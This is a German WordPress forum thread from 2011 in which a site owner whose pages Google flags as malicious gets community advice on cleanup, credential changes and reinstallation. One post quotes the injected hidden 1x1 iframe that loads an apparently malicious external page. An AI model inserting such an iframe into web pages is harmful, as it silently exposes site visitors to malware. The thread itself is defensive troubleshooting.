meine Website wird als schädlich eingestuft

    • Anzeige

    Hallo!

    Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

    • ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

    Mehr erfahren

  • Hallo,

    leider wurde auf deiner WebSite eine Sicherheitslücke gefunden. Über diese Lücke würde ein Malware (link?) eingefügt.

    Code
    Bei 15 Seite(n) von insgesamt 309 Seiten dieser Website, die wir in den  letzten 90 Tagen getestet haben, wurde festgestellt, dass Malware  (Schadsoftware)

    Da mindestens 15 Seite betroffen sind - vermute ich, dass eine Datei auf dem Server verändert oder deine Datenbank verändert.

    Am einfachten nimmst du 100 bis 250 Euro in die Hand und sucht dir einen, der deine Seite von der Malware säubert und die Sicherheitslücken schließt.

    Oder du suchst selber...
    Hier würde ich in der Datenbank anfangen und nach JavaScripten in Beiträgen, suchen die dort nicht verloren haben.

    und in den Log - Files suchen, wie der Angreifer diesen Code in die Datenbank gebracht hat.

    Sollten die Änderungen an den Dateien erfolgt sein? Die Log Files untersuchen und eine saubere Sicherheitskopie zurück spielen...

    viel glück

    ralf

    Mit offenen Augen träumen

  • Ich habe jetzt auf einigen Seiten im Quellcode hinter dem schließenden htm folgende Zeile gefunden:
    <iframe heigth="1" width="1" frameborder="0" src="http://curem.net/t.php?id=1920633"></iframe>
    Nur wie und wo kann ich diese entfernen? Über den Seiteneditor im Backend kann erscheint der Code nicht.

    Hier der komplette Bericht: http://sitecheck.sucuri.net/scanner/?scan=www.osnapicture.de

    Einmal editiert, zuletzt von osnapicture (6. Mai 2011 um 09:51)

  • Ändere deinen Admin, Name und Passwort und lösche den bisherigen.
    Schau per FTP in den php-Dateien deines Themes nach dem Code.

  • Nicht nur im Theme-Ordner, sondern in allen Dateien. Gerne verbreiten sich solche Dinger in allen index u. Javascriptdateien. Ergo: Wenn Du keine komplette Neuinstallation machen möchtest u. wirklich sicher gehen willst, dass der Schadcode überall entfernt wird, dann durchsuche alle Dateien (html, php, js) auf dem Webspace, sowie die Datenbank per PHPMyAdmin

    Dabei nützlich sein kann dieses Tool: http://www.inforapid.de/html/seladen.htm

  • Ich habe mir jetzt alle Dateien per FTP auf den Desktop geladen und dort per Windows-Suche nach "curem" gesucht. Das steht ja überall im Quallcode der infizierten Dateien. Aber per Suche lassen sich die Dateien nicht aufstöbern. Was mach ich falsch?

  • Habe noch weiter auf meinem Server gesucht. Dort gibt es einen ".log" Ordner. Darin befinden sich hunderte html Seiten aus aller Welt. Wie kommen die darein? Kann das was mit meinem Fehler zu tun haben? Und kann ich die einfach löschen?

  • Das würde doch Therorätisch auch funktionieren wenn er ein Backup machen würde , aber nicht von der Datenbank und dann alles von neu draufsetzten im Notfall , weil das mit den Säubern würde länger dauern als das.

  • Ich habe den Code, der für das schädliche iframe sorgte in der index.php gefunden und gelöscht. Außerdem habe ich natürlich mein FTP-Kennwort geändert.
    Ich bin kein Experte, aber aus meiner Sicht müsste jetzt wieder alles klar sein, oder? Ich habe deshalb bei google einen Antrag auf erneute Überprüfung der Seite gestellt. Dem müsste doch stattgegeben werden, oder?

  • Oh je, security scan nicht installiert?

    Grundsätzlich: wp_admin und/oder admin auf ein anderes Nutzername von Anfang an ändern.

    Ich würde jetzt via FTP einen neuen Ordner installieren und darin eine neue WP Installatiion bringen. Auch DB würde ich neu machen, wenn der Hoster dies erlaubt. Das Theme als zip-Datei neu aufladen.
    Alle alten Sachen löschen, löschen, löschen....

    Ob das alles in Ordnung bringt, ist fraglich, aber für mich ist eine derartige Infizierung genauso schlimm wie ein Trojaner auf Festplatte. Dabei hilft auch kein Virenprogramm zu 100% - nur Formatieren der Festplatte :)

    Ist übrigens auch günstiger als einen Experten zum Werk zu bringen.

    Viel Erfolg noch
    RG

    Das ist eine Signatur. Die darf keine Werbung enthalten. Also packt man hierhin ein Zi

  • Deine Antwort bringt mich leider nicht so wirklich weiter. Was meinst Du mit "wp_admin und/oder admin auf ein anderes Nutzername von Anfang an ändern"? Und was ist security scan?
    Ist mein Fehler jetzt wohl behoben und wird google die Sperrung der Seite aufheben oder muss ich noch irgendetwas machen?

  • Deine Antwort bringt mich leider nicht so wirklich weiter. Was meinst Du mit "wp_admin und/oder admin auf ein anderes Nutzername von Anfang an ändern"? Und was ist security scan?
    Ist mein Fehler jetzt wohl behoben und wird google die Sperrung der Seite aufheben oder muss ich noch irgendetwas machen?


    Oh, sorry.

    In vielen Fällen wird bei Erstanmeldung bzw. Einrichtung von Wordpress gleich ein Benutzername (Adminname) eingerichtet: entweder admin oder wp_admin. Dies müsste gleich bei Erstanmeldung geändert werden.

    Security Scan ist ein nützliches Plug-In, das man an einem laufenden Wordpress unbedingt installiert haben sollte.

    Das ist eine Signatur. Die darf keine Werbung enthalten. Also packt man hierhin ein Zi

  • Ob deine Seite jetzt fehlerfrei weiter läuft, weiß ich leider nicht. Aber oben habe ich bereits erwähnt, dass eine komplette Neuinstallation, meiner bescheidenen Meinung nach, sehr empfehlenswert ist. :)

    Das ist eine Signatur. Die darf keine Werbung enthalten. Also packt man hierhin ein Zi

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!